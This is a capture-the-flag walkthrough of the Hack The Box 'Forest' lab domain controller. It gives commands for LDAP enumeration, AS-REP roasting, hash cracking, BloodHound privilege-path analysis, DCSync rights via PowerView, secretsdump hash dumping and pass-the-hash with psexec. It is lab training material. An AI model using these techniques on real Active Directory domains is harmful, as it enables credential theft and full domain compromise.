Forest

Forest in an easy difficulty Windows Domain Controller (DC), for a domain in which Exchange Server has been installed. The DC is found to allow anonymous LDAP binds, which is used to enumerate domain objects. The password for a service account with Kerberos pre-authentication disabled can be cracked to gain a foothold. The service account is found to be a member of the Account Operators group, which can be used to add users to privileged Exchange groups. The Exchange group membership is leveraged to gain DCSync privileges on the domain and dump the NTLM hashes. Skills Required Enumeration Skills Learned ASREPRoasting Enumeration with Bloodhound DCSync Attack

Reconnaisance :

nmap

As usual starting by scanning all the open ports and running services using nmap

The machine appears to be a Domain Controller for the HTB.LOCAL domain.

LDAP :

It's worth checking if the LDAP service allows anonymous binds using the ldapsearch tool.

The -x flag is used to specify anonymous authentication, while the -b flag denotes the basedn to start from. We were able to query the domain without credentials, which means null bind is enabled.

windapsearch

now that we know that we can query the domain without credentials we are going to use a tool called windapsearch to query the domain further.

which is a Python script to enumerate users, groups and computers from a Windows domain through LDAP queries

windapsearch github Link

Enumerating domain Users :

python3 windapsearch.py -d htb.local --dc-ip 10.10.10.161 -U

we can also use enum4linux to enumerate the domain Users and Groups

enum4linux 10.10.10.161

Enumerating Users

Enumerating Groups

Foothold

AS-REP Roasting :

if we have some user's credentials we can use an attack called kerberoasting (we covered this attack in the box active) but in this lab we don't have any credentials but this attack is possible if an account have the property “Do not require Kerberos preauthentication” or UF_DONT_REQUIRE_PREAUTH set to true. AS-REP Roasting is an attack against Kerberos for these accounts.

after doing enum4linux we get a list of users let's filter them and put theme inside a file

now let's use an impacket script to check which account have the property we are looking for set to true in order to perform the AS-REP Roasting attack

let's use the Impacket tool GetNPUsers.py to try to get a hash for the user that have the property set to true

for user in $(cat userslist.txt); do impacket-GetNPUsers -no-pass -dc-ip 10.10.10.161 htb/${user} | grep -v Impacket; done

Get Shell as svc-alfresco :

let's crack the hash using hashcat

hashcat -m 18200 hashes.kerberoast /usr/share/wordlists/rockyou.txt

so the password is s3rvice

evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice

you will find the user flag at

C:\Users\svc-alfresco\Desktop

Privilege Escalation

after using winpeas to look for some priv esc we didn't find anything so let's use bloodhound to visualise the domain and look for privilege escalation paths.

we can transfer sharphound to the target machine to collect the loot and then transfer it back to the attack machine to visualise the data using bloodhound.

but we can collect the loot from our attack machine using a tool called bloodhound.py

bloodhound.py link

python bloodhound.py -d htb.local -u svc-alfresco -p s3rvice -gc forest.htb.local -c all -ns 10.10.10.161

and then upload this data to bloodhound

in the bloodhound search type svc-alfresco and in the target node Domain Admins

Join Exchange Windows Permissions Group

Because my user is in Service Account, which is a member of Privileged IT Account, which is a member of Account Operators, it’s basically like my user is a member of Account Operators. And Account Operators has Generic All privilege on the Exchange Windows Permissions group

if we right click on generic all we can get a help on how to abuse this relationship

let's look at abuse info

this gives full background on how to abuse this if you scroll down you will find some exemples :

Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members 'svc-alfresco' -Credential $Cred

net group "Exchange Windows Permissions" svc-alfresco /add /domain

since we are member of account operators we have the write to create new users and add them to groups

let's create a new user and add him to the Exchange Windows Permissions

Grant DCSync Privileges :

Now I’ll use the fact that members of the Exchange Windows Permissions group have WriteDacl on the domain

again looking at the help by right clicking on writeDacl edge and clicking in help

let's go to the abuse info tab to see how we can abuse this

Then, first i imported the PowerView.ps1 module and then using it assigned the DCSync privilege to the newly created ismail user

$SecPassword = ConvertTo-SecureString 'Lionel129!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb\ismail', $SecPassword)

Add-DomainObjectAcl -Credential $Cred -TargetIdentity 'DC=htb,DC=local' -Rights DCSync -PrincipalIdentity ismail -Domain htb.local

Then, on my machine, using the impacket’s secretsdump script and newly created user, dumped the hashes from domain.

impacket-secretsdump htb.local/ismail@10.10.10.161

impacket-psexec htb.local/administrator@10.10.10.161 -hashes <hash>

you can find the flag at

C:\Users\Administrator\Desktop

hope you found this walkthrough easy to understand and follow

Greeting From Sayonara